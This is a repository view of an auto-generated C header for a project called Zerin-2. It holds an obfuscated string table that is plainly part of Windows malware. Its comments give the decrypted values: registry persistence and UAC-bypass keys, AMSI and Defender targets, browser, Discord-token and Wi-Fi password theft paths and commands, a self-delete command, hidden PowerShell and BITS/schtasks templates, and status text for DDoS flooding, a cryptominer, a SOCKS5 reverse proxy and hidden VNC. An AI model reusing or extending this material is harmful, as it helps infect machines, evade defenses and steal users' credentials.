Files
Zerin-2/include/obf_strings_gen.h
T

133 lines
9.4 KiB
C
Raw Normal View History

2026-08-27 11:03:10 -06:00
// Auto-generated by generate_strings.py - DO NOT EDIT
// Regenerated with random key on every build for polymorphic output.
#ifndef OBF_STRINGS_GEN_H
#define OBF_STRINGS_GEN_H
#include <stddef.h>
// String IDs
enum {
OBF_ZERIN_UPDATE = 0, // "Atow1LUpdate" (12 bytes)
OBF_ZERIN_SVC = 1, // "Atow1LSvc" (9 bytes)
OBF_ZERIN_MAINTENANCE = 2, // "Atow1LMaintenance" (17 bytes)
OBF_ZERIN_TRANSFER = 3, // "Atow1LTransfer" (14 bytes)
OBF_ZERIN_WMI = 4, // "Atow1LWMI" (9 bytes)
OBF_ZERIN_PORT = 5, // "Atow1LPort" (10 bytes)
OBF_ZERIN_UPDATE_EXE = 6, // "Atow1LUpdate.exe" (16 bytes)
OBF_ZERIN_EXE = 7, // "atow1L.exe" (10 bytes)
OBF_RUN_KEY_PATH = 8, // "Software\\Microsoft\\Windows\\CurrentVersion\\Run" (45 bytes)
OBF_SESSION_KEY_PATH = 9, // "Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo" (62 bytes)
OBF_ENVIRONMENT = 10, // "Environment" (11 bytes)
OBF_DESKTOP_PATH = 11, // "Control Panel\\Desktop" (21 bytes)
OBF_SCRNSAVE = 12, // "SCRNSAVE.EXE" (12 bytes)
OBF_LOGON_SCRIPT = 13, // "UserInitMprLogonScript" (22 bytes)
OBF_MAINTENANCE_VAL = 14, // "Maintenance" (11 bytes)
OBF_SETHC_IFEO = 15, // "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe" (83 bytes)
OBF_PRINT_MONITORS = 16, // "SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors" (47 bytes)
OBF_LSA_PATH = 17, // "SYSTEM\\CurrentControlSet\\Control\\Lsa" (36 bytes)
OBF_SECURITY_PACKAGES = 18, // "Security Packages" (17 bytes)
OBF_COM_CLSID_PATH = 19, // "Software\\Classes\\CLSID\\{42aedc87-2188-41fd-b9a3-0c966feab6b5}\\InProcServer32" (76 bytes)
OBF_SHM_NAME = 20, // "Local\\Atow1LRkShm" (17 bytes)
OBF_EVT_NAME = 21, // "Local\\Atow1LRkEvt" (17 bytes)
OBF_SERVICES_PATH = 22, // "SYSTEM\\CurrentControlSet\\Services" (33 bytes)
OBF_DEBUGGER = 23, // "Debugger" (8 bytes)
OBF_DRIVER = 24, // "Driver" (6 bytes)
OBF_THREADING_MODEL = 25, // "ThreadingModel" (14 bytes)
OBF_SCREEN_SAVE_ACTIVE = 26, // "ScreenSaveActive" (16 bytes)
OBF_SCREEN_SAVE_TIMEOUT = 27, // "ScreenSaveTimeOut" (17 bytes)
OBF_ZERIN_DISPLAY = 28, // "Atow1L Maintenance Service" (26 bytes)
OBF_CMD_EXE = 29, // "cmd.exe" (7 bytes)
OBF_NTDLL = 30, // "ntdll.dll" (9 bytes)
OBF_KERNEL32 = 31, // "kernel32.dll" (12 bytes)
OBF_ADVAPI32 = 32, // "advapi32.dll" (12 bytes)
OBF_WINHTTP = 33, // "winhttp.dll" (11 bytes)
OBF_POWERSHELL = 34, // "powershell.exe" (14 bytes)
OBF_PERSIST_MUTEX = 35, // "Local\\Atow1LPersistMtx" (22 bytes)
OBF_MS_SETTINGS_CMD = 36, // "Software\\Classes\\ms-settings\\shell\\open\\command" (47 bytes)
OBF_DELEGATE_EXECUTE = 37, // "DelegateExecute" (15 bytes)
OBF_NETAPI32 = 38, // "netapi32.dll" (12 bytes)
OBF_AMSI = 39, // "amsi.dll" (8 bytes)
OBF_MSMPENG = 40, // "MsMpEng.exe" (11 bytes)
OBF_MPCMDRUN = 41, // "MpCmdRun.exe" (12 bytes)
OBF_MSSENSE = 42, // "MsSense.exe" (11 bytes)
OBF_SECHEALTH = 43, // "SecurityHealthService.exe" (25 bytes)
OBF_SGRMBROKER = 44, // "SgrmBroker.exe" (14 bytes)
OBF_CHROME_USERDATA = 45, // "Google\\Chrome\\User Data" (23 bytes)
OBF_EDGE_USERDATA = 46, // "Microsoft\\Edge\\User Data" (24 bytes)
OBF_BRAVE_USERDATA = 47, // "BraveSoftware\\Brave-Browser\\User Data" (37 bytes)
OBF_OPERA_USERDATA = 48, // "Opera Software\\Opera Stable" (27 bytes)
OBF_VIVALDI_USERDATA = 49, // "Vivaldi\\User Data" (17 bytes)
OBF_FIREFOX_REG = 50, // "SOFTWARE\\Mozilla\\Mozilla Firefox" (32 bytes)
OBF_FIREFOX_REGMAIN = 51, // "SOFTWARE\\Mozilla\\Mozilla Firefox\\%s\\Main" (40 bytes)
OBF_FIREFOX_X64 = 52, // "C:\\Program Files\\Mozilla Firefox" (32 bytes)
OBF_FIREFOX_X86 = 53, // "C:\\Program Files (x86)\\Mozilla Firefox" (38 bytes)
OBF_VERSION_DLL = 54, // "version.dll" (11 bytes)
OBF_DXGI_DLL = 55, // "dxgi.dll" (8 bytes)
OBF_D3D11_DLL = 56, // "d3d11.dll" (9 bytes)
OBF_RSTRTMGR_DLL = 57, // "rstrtmgr.dll" (12 bytes)
OBF_WMIC_AV = 58, // "cmd.exe /c wmic /namespace:\\\\root\\SecurityCenter2 path AntiVirusProduct get displayName /format:list" (100 bytes)
OBF_NETSH_PROFILES = 59, // "netsh wlan show profiles" (24 bytes)
OBF_NETSH_PROFILE_KEY = 60, // "netsh wlan show profile name=\\\"%s\\\" key=clear" (45 bytes)
OBF_IPCONFIG_FLUSH = 61, // "cmd.exe /c ipconfig /flushdns" (29 bytes)
OBF_SELF_DELETE = 62, // "cmd.exe /c ping 127.0.0.1 -n 3 > nul & del /f /q \\\"%s\\\"" (55 bytes)
OBF_REG_CRYPTOGRAPHY = 63, // "SOFTWARE\\Microsoft\\Cryptography" (31 bytes)
OBF_REG_PUTTY = 64, // "SOFTWARE\\SimonTatham\\PuTTY\\Sessions" (35 bytes)
OBF_REG_CPU = 65, // "HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0" (46 bytes)
OBF_NTDLL_PATH = 66, // "C:\\Windows\\System32\\ntdll.dll" (29 bytes)
OBF_HOSTS_PATH = 67, // "C:\\Windows\\System32\\drivers\\etc\\hosts" (37 bytes)
OBF_SETHC_EXE = 68, // "sethc.exe" (9 bytes)
OBF_FODHELPER_EXE = 69, // "fodhelper.exe" (13 bytes)
OBF_CLIPMON_CLASS = 70, // "Atow1LClipMon" (13 bytes)
OBF_BLACK_CLASS = 71, // "Atow1LBlack" (11 bytes)
OBF_WEBCAM_CLASS = 72, // "Atow1LWebcam" (12 bytes)
OBF_DISCORD_LDB = 73, // "discord\\Local Storage\\leveldb" (29 bytes)
OBF_DISCORD_CANARY_LDB = 74, // "discordcanary\\Local Storage\\leveldb" (35 bytes)
OBF_DISCORD_PTB_LDB = 75, // "discordptb\\Local Storage\\leveldb" (32 bytes)
OBF_BRAVE_EXE_PATH = 76, // "BraveSoftware\\Brave-Browser\\Application\\brave.exe" (49 bytes)
OBF_CHROME_EXE_PATH = 77, // "Google\\Chrome\\Application\\chrome.exe" (36 bytes)
OBF_EDGE_EXE_PATH = 78, // "Microsoft\\Edge\\Application\\msedge.exe" (37 bytes)
OBF_FIREFOX_EXE_PATH = 79, // "Mozilla Firefox\\firefox.exe" (27 bytes)
OBF_PS_PREFIX = 80, // "powershell.exe -NoProfile -NonInteractive -ExecutionPolicy Bypass -Command " (75 bytes)
OBF_PS_HIDDEN_PREFIX = 81, // "powershell.exe -NoProfile -NonInteractive -WindowStyle Hidden -Command " (71 bytes)
OBF_SCHTASKS_FMT = 82, // "schtasks /Create /TN \\\"%s\\\" /TR \\\"\\\\\"%s\\\\\"\\\" /SC MINUTE /MO %s /F" (65 bytes)
OBF_BITS_CHAIN_FMT = 83, // "cmd.exe /c bitsadmin /create \\\"%s\\\" && bitsadmin /addfile \\\"%s\\\" \\\"https://localhost/noexist\\\" \\\"%%TEMP%%\\atow1L_bits.tmp\\\" && bitsadmin /SetNotifyCmdLine \\\"%s\\\" \\\"%s\\\" NUL && bitsadmin /SetMinRetryDelay \\\"%s\\\" 60 && bitsadmin /SetNoProgressTimeout \\\"%s\\\" 2592000 && bitsadmin /resume \\\"%s\\\"" (291 bytes)
OBF_WMI_PS_FMT = 84, // "powershell.exe -NoProfile -NonInteractive -WindowStyle Hidden -Command \\\"" (73 bytes)
OBF_AMSI_OPEN_SESSION = 85, // "AmsiOpenSession" (15 bytes)
OBF_REFLECTIVE_DLL_MAIN = 86, // "ReflectiveDllMain" (17 bytes)
OBF_ELEVATION_MONIKER = 87, // "Elevation:Administrator!new:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}" (66 bytes)
OBF_DDOS_STARTED_FMT = 88, // "DDoS flood started: %s %s | %d threads | %d seconds" (51 bytes)
OBF_DDOS_ALREADY = 89, // "DDoS flood already running. Stop it first." (42 bytes)
OBF_DDOS_STOPPED_FMT = 90, // "DDoS flood stopped. Duration: %lus | Requests: %ld | Errors: %ld | Avg: %.0f req/s" (82 bytes)
OBF_DDOS_NOT_RUNNING = 91, // "No DDoS flood is running" (24 bytes)
OBF_MINER_STARTED_FMT = 92, // "Miner started (PID %lu) | Pool: %s | CPU: %d%% | API port: %d" (61 bytes)
OBF_MINER_ALREADY = 93, // "Miner already running. Stop it first." (37 bytes)
OBF_MINER_STOPPED_FMT = 94, // "Miner stopped (PID %lu)" (23 bytes)
OBF_MINER_NOT_RUNNING = 95, // "No miner is running" (19 bytes)
OBF_MINER_DIR = 96, // "Microsoft\\Runtime" (17 bytes)
OBF_MINER_EXE = 97, // "svcruntime.exe" (14 bytes)
OBF_SOCKS5_STARTED = 98, // "SOCKS5 reverse proxy started" (28 bytes)
OBF_SOCKS5_STOPPED = 99, // "SOCKS5 reverse proxy stopped" (28 bytes)
OBF_SOCKS5_NOT_RUNNING = 100, // "SOCKS5 was not running" (22 bytes)
OBF_MS_SETTINGS_OPEN = 101, // "Software\\Classes\\ms-settings\\shell\\open" (39 bytes)
OBF_MS_SETTINGS_SHELL = 102, // "Software\\Classes\\ms-settings\\shell" (34 bytes)
OBF_MS_SETTINGS_ROOT = 103, // "Software\\Classes\\ms-settings" (28 bytes)
OBF_HVNC_STARTED = 104, // "hVNC streaming started (hidden desktop created)" (47 bytes)
OBF_HVNC_STOPPED = 105, // "hVNC stopped (hidden desktop destroyed)" (39 bytes)
OBF_HVNC_NOT_RUNNING = 106, // "hVNC was not running" (20 bytes)
OBF_HVNC_NOT_ACTIVE = 107, // "hVNC session is not active" (26 bytes)
OBF_SCHTASKS_DELETE_FMT = 108, // "schtasks /Delete /TN \\\"%s\\\" /F" (30 bytes)
OBF_BITSADMIN_CANCEL_FMT = 109, // "bitsadmin /cancel \\\"%s\\\"" (24 bytes)
OBF_PS_WMIDELETE_FMT = 110, // "powershell.exe -NoProfile -NonInteractive -WindowStyle Hidden -Command \\\"Get-WmiObject -Namespace root\\subscription -Class __EventFilter | Where-Object { $_.Name -eq '%s' } | Remove-WmiObject; Get-WmiObject -Namespace root\\subscription -Class CommandLineEventConsumer | Where-Object { $_.Name -eq '%s' } | Remove-WmiObject\\\"" (324 bytes)
OBF_PS_ENCODED_HIDDEN = 111, // "powershell -NoProfile -WindowStyle Hidden -EncodedCommand %s" (60 bytes)
OBF_PS_ENCODED = 112, // "powershell -NoProfile -EncodedCommand %s" (40 bytes)
OBF_STRING_COUNT = 113
};
// Decrypt string into caller-provided buffer. Returns buf, or NULL on error.
char *obf_decrypt_to(int id, char *buf, size_t buf_size);
// Wipe a decrypted buffer after use.
void obf_wipe(char *buf, size_t len);
#endif // OBF_STRINGS_GEN_H